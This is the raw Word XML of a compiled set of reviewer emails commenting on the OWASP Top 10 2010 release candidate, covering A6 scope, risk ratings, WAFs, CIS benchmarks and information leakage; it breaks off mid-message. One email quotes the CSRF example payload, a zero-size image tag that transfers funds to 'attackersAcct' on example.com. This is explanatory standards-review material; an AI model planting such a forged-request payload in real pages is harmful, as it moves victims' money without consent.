          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Top 10 and with the appearance of a fluffy A6 on the list, there will be several points of overlap between the other areas of the PCI standard and A6 (e.g. patch management) where there were no overlap before since the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Owasp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Top 10 focused solely on application security (and this is how it should continue to be in our opinion). We see the following options:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Change the scope of A6 so it is aligned to a true OWASP scope, i.e. only include security in directly included libraries of the applications, leaving out all other parts of basic system security. This is our preferred and suggested change.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">- Remove A6 entirely, or perhaps it could be moved to be </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> A0 as basic system security is a prerequisite for application security.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Create a separate and new top 10 list for platform/OS/system risks, and include the current A6 in that one.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A8 </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">- The box should be </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>red</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Detectability</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>A9</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">- Prevalence should be “Common” based on the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Owasp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Denmark group’s experience</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>A10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">- Prevalence should be “wide spread” based on the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Owasp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Denmark group’s experience</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>I hope you find our input valuable.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Happy New Year!</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Best,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Ulf </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Munkedal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Chapter Chair, Denmark</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C45ADB" w:rsidRDefault="007B2E45" w:rsidP="00C914CE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00662E80">
        <w:t>Johanne</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00662E80">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00662E80">
        <w:t>Ulloa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00662E80" w:rsidRDefault="00662E80" w:rsidP="00662E80">
      <w:r>
        <w:t>Hello Dave</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">First, I would like to introduce myself. I work since a few years for Deny All, a WAF vendor. I would like to congratulate you and other people that contributed to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>these doc</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">. The point I like especially is the methodology to calculate the risk. Let's talk about </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>mitigation,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> this is the main reason why I write you this email.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>On the PDF:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>    * First surprise: nothing on the negative security model.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>On the PPT:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    * Second surprise, still nothing on negative security model and positive security model </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>model</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is related to the development phases.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>    * First surprise, nothing related to WAF in the slide "How to address the problem"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Do you think that a WAF is in opposition with the secure development?  Both are totally complementary. Companies will reach a good security level ONLY if both aspects are taken in consideration. Even if a developer has been trained to develop securely, he can make mistakes. And a WAF can't block everything. Alone, WAF of SDLC </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>are</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> weak.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">So, don't you think your </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>approach that consist</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (in the better case) to not mention WAF is the better you can offer? Don't you think that there's a lot of company that don't have any control on the dev team? (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>in</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> that case, what will be the added value of the slide "How to address the problem"?</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>So, I suggest to talk about negative security model and WAF in mitigations because it is used and useful and complementary to SDLC</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Best regards</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Johanne</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00C45ADB" w:rsidRDefault="007B2E45" w:rsidP="00C914CE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:r w:rsidR="004C266D">
        <w:t>Darren Todd</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C266D" w:rsidRDefault="004C266D" w:rsidP="004C266D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Hi Dave, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C266D" w:rsidRDefault="004C266D" w:rsidP="004C266D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Regarding the excellent Top Ten OWASP 2010 paper I have a very minor comment on the RC1 version (from </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>http://www.owasp.org/images/0/0f/OWASP_T10_-_2010_rc1.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>) :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="004C266D" w:rsidRDefault="004C266D" w:rsidP="004C266D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>In section A5 – CSRF, page 12 the Example Attack lists the application URI as:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C266D" w:rsidRDefault="004C266D" w:rsidP="004C266D">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>http://example.com/app/transferFunds?amount=1500&amp;destinationAccount=4673243243</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="004C266D" w:rsidRDefault="004C266D" w:rsidP="004C266D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">But the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>attackers</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> image source URI is </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C266D" w:rsidRDefault="004C266D" w:rsidP="004C266D">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>&lt;imgsrc="</w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>http://example.com/transferFunds?amount=1500&amp;destinationAccount=attackersAcct#“width=</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>"0" height="0" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C266D" w:rsidRDefault="004C266D" w:rsidP="004C266D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>For completeness sake, should this include the “app/”</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>  path</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the URI, i.e. :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C266D" w:rsidRDefault="004C266D" w:rsidP="004C266D">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>&lt;imgsrc="</w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>http://example.com/app/transferFunds?amount=1500&amp;destinationAccount=attackersAcct#“width=</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>"0" height="0" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C266D" w:rsidRDefault="004C266D" w:rsidP="004C266D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Thanks for this paper, finding it very useful and interesting reading material.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C266D" w:rsidRDefault="004C266D" w:rsidP="004C266D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Best regards,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C266D" w:rsidRDefault="004C266D" w:rsidP="004C266D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Darren</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C45ADB" w:rsidRDefault="007B2E45" w:rsidP="00C914CE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:r w:rsidR="0020677A">
        <w:t>Blake Frantz</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0020677A" w:rsidRDefault="0020677A" w:rsidP="0020677A">
      <w:r>
        <w:t>Hi Dave,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0020677A" w:rsidRDefault="0020677A" w:rsidP="0020677A">
      <w:r>
        <w:t xml:space="preserve">What are your thoughts on including a reference to the CIS benchmarks for item “A6 –Security </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Misconfiguration</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (NEW)” in the OWASP 2010 Top 10?  You can get a list of all our configuration guides here: </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://cisecurity.org/en-us/?route=downloads.multiform</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0020677A" w:rsidRDefault="0020677A" w:rsidP="0020677A">
      <w:r>
        <w:t>I’m happy to hop on the phone to discuss this possibility in greater detail.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0020677A" w:rsidRDefault="0020677A" w:rsidP="0020677A">
      <w:r>
        <w:t>Thanks for your time.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0020677A" w:rsidRDefault="007B2E45" w:rsidP="0020677A">
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:r>
        <w:t>Blake Frantz</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C45ADB" w:rsidRDefault="00C307E9" w:rsidP="00C914CE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From James </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Jardine</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C307E9" w:rsidRDefault="00C307E9" w:rsidP="00BC0217">
      <w:r>
        <w:t>Hi Dave,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C307E9" w:rsidRDefault="00C307E9" w:rsidP="00BC0217">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  I was just looking over the new Release Candidate for the Top 10 for 2010 and just wanted to express my thoughts on the removal of the information Leakage and improper error handling.  The RC states "this issue is extremely prevalent, but the impact of disclosing stack trace and error message information is typically minimal."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C307E9" w:rsidRDefault="00C307E9" w:rsidP="00BC0217">
      <w:r>
        <w:t xml:space="preserve">I would contest that statement especially since Injection was moved to the number 1 spot on the top 10.  Stack trace information can be extremely helpful in SQL Injection and fingerprinting the Database.  The </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>disclosure of File Paths also lead</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to important information that can tell the exact language used, and directory structures for traversing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C307E9" w:rsidRDefault="00C307E9" w:rsidP="00BC0217">
      <w:r>
        <w:t>I don't disagree that the new added items are not large risks and I am sure that limiting the list to 10 is a difficult process.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C307E9" w:rsidRDefault="00C307E9" w:rsidP="00BC0217">
      <w:r>
        <w:t>I personally appreciate all the hard work everyone has put in to creating and maintaining the OWASP site.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C307E9" w:rsidRDefault="00C307E9" w:rsidP="00BC0217">
      <w:r>
        <w:t>Thanks,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C307E9" w:rsidRDefault="00C307E9" w:rsidP="00BC0217">
      <w:r>
        <w:t xml:space="preserve">James </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Jardine</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00BC0217" w:rsidRDefault="00BC0217" w:rsidP="00C914CE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>From Michael Brooks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC0217" w:rsidRDefault="00BC0217" w:rsidP="00BC0217">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
      </w:pPr>
      <w:r>
        <w:t>I have read over the OWASP top 10 for 2010 and I like it. However, I disagree that CSRF (A5</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>)  should</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> be higher on the list in OWASP 2010.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC0217" w:rsidRDefault="00BC0217" w:rsidP="00BC0217">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BC0217" w:rsidRDefault="00BC0217" w:rsidP="00BC0217">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> According to the United States Department </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Homeland Security the most dangerous CSRF vulnerability ranks in at the 908th most dangerous software bug ever found (</w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://www.kb.cert.org/CERT_WEB%5Cservices%5Cvul-notes.nsf/bymetric?open&amp;start=908</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
